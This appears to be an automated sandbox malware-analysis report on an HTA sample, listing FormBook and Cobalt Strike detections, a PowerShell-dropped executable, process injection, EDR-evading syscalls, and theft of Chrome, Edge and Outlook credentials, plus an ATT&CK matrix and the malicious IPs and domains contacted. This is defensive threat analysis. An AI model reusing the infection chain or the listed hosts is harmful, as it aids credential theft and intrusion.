                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00044E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,12_2_00044E87
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00051E06 GetUserNameW,12_2_00051E06
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00043F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,12_2_00043F3A
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_000149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,12_2_000149A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 13.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000010.00000002.3663915117.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.3664272191.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.1614478454.0000000007480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.1609453239.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3675591492.0000000006A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.3664383512.0000000003370000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.1611189571.00000000047A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3666208376.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                  Source: igcc.exeBinary or memory string: WIN_81
                  Source: igcc.exeBinary or memory string: WIN_XP
                  Source: igcc.exeBinary or memory string: WIN_XPe
                  Source: igcc.exeBinary or memory string: WIN_VISTA
                  Source: igcc.exeBinary or memory string: WIN_7
                  Source: igcc.exeBinary or memory string: WIN_8
                  Source: igcc.exe.3.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                  Remote Access Functionality

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 13.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000010.00000002.3663915117.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.3664272191.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.1614478454.0000000007480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.1609453239.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3675591492.0000000006A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.3664383512.0000000003370000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.1611189571.00000000047A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3666208376.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00086283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,12_2_00086283
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00086747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,12_2_00086747

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure2
                  Valid Accounts                  		1
                  Native API                  		1
                  DLL Side-Loading                  		1
                  Exploitation for Privilege Escalation                  		1
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		14
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts11
                  Command and Scripting Interpreter                  		2
                  Valid Accounts                  		1
                  Abuse Elevation Control Mechanism                  		1
                  Deobfuscate/Decode Files or Information                  		21
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		1
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts3
                  PowerShell                  		Logon Script (Windows)1
                  DLL Side-Loading                  		1
                  Abuse Elevation Control Mechanism                  		Security Account Manager2
                  File and Directory Discovery                  		SMB/Windows Admin Shares11
                  Email Collection                  		4
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                  Valid Accounts                  		3
                  Obfuscated Files or Information                  		NTDS128
                  System Information Discovery                  		Distributed Component Object Model21
                  Input Capture                  		14
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                  Access Token Manipulation                  		1
                  DLL Side-Loading                  		LSA Secrets251
                  Security Software Discovery                  		SSH3
                  Clipboard Data                  		Fallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
                  Process Injection                  		1
                  Masquerading                  		Cached Domain Credentials31
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                  Valid Accounts                  		DCSync3
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                  Virtualization/Sandbox Evasion                  		Proc Filesystem11
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                  Access Token Manipulation                  		/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron312
                  Process Injection                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1665583 Sample: njo.hta Startdate: 15/04/2025 Architecture: WINDOWS Score: 100 54 www.vczuahand.xyz 2->54 56 www.play-venom-rush.xyz 2->56 58 16 other IPs or domains 2->58 76 Suricata IDS alerts for network traffic 2->76 78 Antivirus detection for URL or domain 2->78 80 Multi AV Scanner detection for dropped file 2->80 84 7 other signatures 2->84 13 mshta.exe 1 2->13         started        signatures3 82 Performs DNS queries to domains with low reputation 56->82 process4 signatures5 108 Suspicious command line found 13->108 110 PowerShell case anomaly found 13->110 16 cmd.exe 1 13->16         started        process6 signatures7 68 Detected Cobalt Strike Beacon 16->68 70 Suspicious powershell command line found 16->70 72 PowerShell case anomaly found 16->72 19 powershell.exe 46 16->19         started        24 conhost.exe 16->24         started        process8 dnsIp9 60 172.245.208.21, 49721, 80 AS-COLOCROSSINGUS United States 19->60 46 C:\Users\user\AppData\Roaming\igcc.exe, PE32 19->46 dropped 48 C:\Users\user\AppData\Local\...\igcc[1].exe, PE32 19->48 dropped 50 C:\Users\user\AppData\...\qetstupm.cmdline, Unicode 19->50 dropped 86 Loading BitLocker PowerShell Module 19->86 88 Powershell drops PE file 19->88 26 igcc.exe 2 19->26         started        29 csc.exe 3 19->29         started        file10 signatures11 process12 file13 100 Multi AV Scanner detection for dropped file 26->100 102 Binary is likely a compiled AutoIt script file 26->102 104 Writes to foreign memory regions 26->104 106 2 other signatures 26->106 32 svchost.exe 26->32         started        52 C:\Users\user\AppData\Local\...\qetstupm.dll, PE32 29->52 dropped 35 cvtres.exe 1 29->35         started        signatures14 process15 signatures16 74 Maps a DLL or memory area into another process 32->74 37 WRNKS5Hlc0y.exe 32->37 injected process17 dnsIp18 62 www.worrr37.yachts 168.76.121.210, 49723, 80 ULTRANETSERVICOSEMINTERNETLTDABR South Africa 37->62 64 www.soportemx-findmy.click 173.255.194.134, 49725, 49726, 49727 LINODE-APLinodeLLCUS United States 37->64 66 9 other IPs or domains 37->66 90 Found direct / indirect Syscall (likely to bypass EDR) 37->90 41 AtBroker.exe 13 37->41         started        signatures19 process20 signatures21 92 Tries to steal Mail credentials (via file / registry access) 41->92 94 Tries to harvest and steal browser information (history, passwords, etc) 41->94 96 Modifies the context of a thread in another process (thread injection) 41->96 98 2 other signatures 41->98 44 firefox.exe 41->44         started        process22

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.